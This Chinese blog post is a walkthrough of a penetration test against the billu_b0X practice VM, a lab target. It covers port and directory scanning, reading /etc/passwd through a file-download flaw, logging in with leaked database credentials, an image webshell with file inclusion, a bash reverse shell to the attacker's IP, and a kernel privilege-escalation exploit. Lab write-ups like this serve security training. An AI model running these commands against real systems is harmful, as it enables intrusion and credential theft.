靶机练习-1:billu_b0X

于 2021-01-12 14:47:09 发布
阅读量1.2k 收藏 5
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 靶机 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yifujiadeng/article/details/112524317
本文围绕billu_b0X靶机展开渗透测试。先进行环境准备,包括设置虚拟机。接着开展渗透,信息收集确定靶机IP、扫描端口服务与目录页面;漏洞挖掘通过文件下载、审计源码等找到登录信息,利用图片上传和文件包含获shell;最后进行提权,借助有写权限目录和提权exp实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机练习-1:billu_b0X

过程部分参考自:https://zhuanlan.zhihu.com/p/114914172?from_voters_page=true

环境准备:

Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址

kali linux 2020虚拟机,ip地址192.168.1.137

渗透步骤:
信息收集:
1.ip发现
nmap -sP 192.168.1.0/24

使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址,

目标靶机ip为192.168.1.132

在这里插入图片描述

或者使用命令arp-scan -l扫描,效果相同,且不扫描本机

在这里插入图片描述

2.端口及服务扫描

使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描,生成结果文件a.txt

nmap -p1-65535 -A 192.168.1.132 -oN a.txt

在这里插入图片描述

从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下

show me your sqli skills:让展示一下注入技巧,sqlmap测试未果,再看看其他的目录

在这里插入图片描述

3.目录及页面扫描

用kali的dirb跑一下目录

在这里插入图片描述

同时windows用御剑跑一下,可以得到更多的爆破结果

在这里插入图片描述

得到页面较多,test.php、add.php、in.php、c.php、index.php、show.php等,目录有:uploaded_images,phpmy,依次访问

漏洞挖掘
1.访问test.php:页面提示file参数为空,需要提供file参数

测试一下文件下载,不行,会跳转回首页

在这里插入图片描述

2.在Firefox的Hackbar中,将get请求,变更为post请求,文件下载

成功,获得passwd文件,这里用burp改包也行,但是要麻烦一些,就直接hackbar了。

在这里插入图片描述

3.通过同样文件下载的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以访问文件的同时,审计文件的源代码。

在这里插入图片描述

在这里插入图片描述

  1. 查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root

在这里插入图片描述

访问add.php、in.php页面和审计代码

add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息

在这里插入图片描述

在这里插入图片描述

5.查看c.php源码

这是个数据库连接文件,人家直接写了mysql连接用户名密码

在这里插入图片描述

6.通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面

在这里插入图片描述

用刚刚在c.php看到的用户名:billu,密码:b0x_billu登录,登录成功

在这里插入图片描述

在ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it

7.回index.php,登进去

进来以后看到一个账号管理界面,里面已经有了两个账户,杰克船长和巴博萨船长

在这里插入图片描述

两个账号的头像图片地址,在之前已经暴破出来:uploaded_images,登上去,下载一张图片jack.jpg出来,里面有些乱七八糟的东西,是我第一遍做的时候传上去的,不管它们,不影响接着做

在这里插入图片描述

7.点击add user进入添加账号界面,这是一个图片上传,可以利用图片上传和文件包含获得shell。

查看之前test文件包含获得的panel.php源码,发现panel.php存在本地文件包含漏洞:
在这里插入图片描述

image-20210101103835037

用记事本打开刚刚下载下来的图片,在文件末尾加一条命令,生成图片马

在这里插入图片描述

把这张图片上传上去

在这里插入图片描述

测试一下图片马能否正常使用,点击continue,用burp抓包,使用burp执行命令:

post请求url中加入执行命令的参数:POST /panel.php?cmd=cat%20/etc/passwd;ls

post的body中包含cmd.jpg图片马:load=/uploaded_images/3.jpg&continue=continue

在这里插入图片描述

可以看到测试没有问题,命令成功被执行

在这里插入图片描述

8.制作一个反弹shell,命令:echo “bash -i >& /dev/tcp/192.168.1.137/4444 0>&1″ | bash

需要先将命令url编码:

在这里插入图片描述

在post的url中加入编码好的命令

在这里插入图片描述

在发送前,先在命令行nc监听,以便接受反弹shell

在这里插入图片描述

点击发送,接收成功

在这里插入图片描述

提权
1.提权准备工作

这里需要找一个有写权限的目录,先前我们上传图片的那个目录/uploaded_images,很显然就有写权限,不然也没法往里面上传图片,我们先进入到这个目录下
在这里插入图片描述

在这个目录下写一个php菜刀马,一会方便用菜刀连接传输文件,菜刀连接一下,如图连接成功

在这里插入图片描述

2.提升权限

查看系统内核,命令uanme -a和cat /etc/issue

可以看到详细的系统信息

在这里插入图片描述

这里可以使用一个著名的ubuntu本地提权exp,https://www.exploit-db.com/exploits/37292,这个链接可以下载下来

下载后把这个文件用菜刀放到/uploaded_images目录下

在这里插入图片描述

然后赋予这个文件权限

在这里插入图片描述

编译exp

在这里插入图片描述

然后运行即可提权

在这里插入图片描述

查看是否生效,如图,提权成功

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值